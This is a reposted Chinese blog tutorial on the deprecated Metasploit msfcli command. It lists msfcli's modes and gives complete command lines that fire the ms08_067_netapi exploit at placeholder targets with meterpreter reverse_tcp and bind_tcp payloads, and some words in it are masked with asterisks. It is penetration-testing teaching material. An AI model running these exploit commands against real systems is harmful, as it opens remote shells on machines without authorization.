Metasploit（三）--Msfcli命令

原文：《metasploit the pentration tester’s guide》

msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号 被弃用了

root@xxoo:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]
=======================================================================

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module      #显示该模块的所有高级配置选项 (AC)tions Show available actions for this auxiliary module            #显示辅助模块的所有可用动作 (C)heck Run the check routine of the selected module            #运行选定模块的检查例程

(E)xecute Execute the selected module                    #运行选定的模块

(H)elp You’re looking at it baby!                      #帮助信息                    
(I)DS Evasion Show available ids evasion options for this module  #显示该模块的可用IDS逃逸选项(O)ptions Show available options for this module                        #显示所有配置选项

(P)ayloads Show available payloads for this module                #显示该模块适用的***载荷 (S)ummary Show information about this module                   #显示关于该模块详细信息

(T)argets Show available targets for this exploit module      #显示******模块的所有***目标类型

查看某一个exploit的options :

root@xxoo:~# msfcli windows/smb/ms08_067_netapi O

 

设置options 同时显示payloads的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 P

设置好options,payloads然后执行exploit的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=www.xx.com PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxoo E

root@xxoo:~# msfcli | grep exploit
仅列出******模块。

root@xxoo:~# msfcli | grep exploit/windows
仅列出与windows相关的******模块。

root@xxoo:~# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi******，配置了bind_tcp***载荷，并绑定在PORT端口进行监听。

转载于:https://blog.51cto.com/maxvision/1689044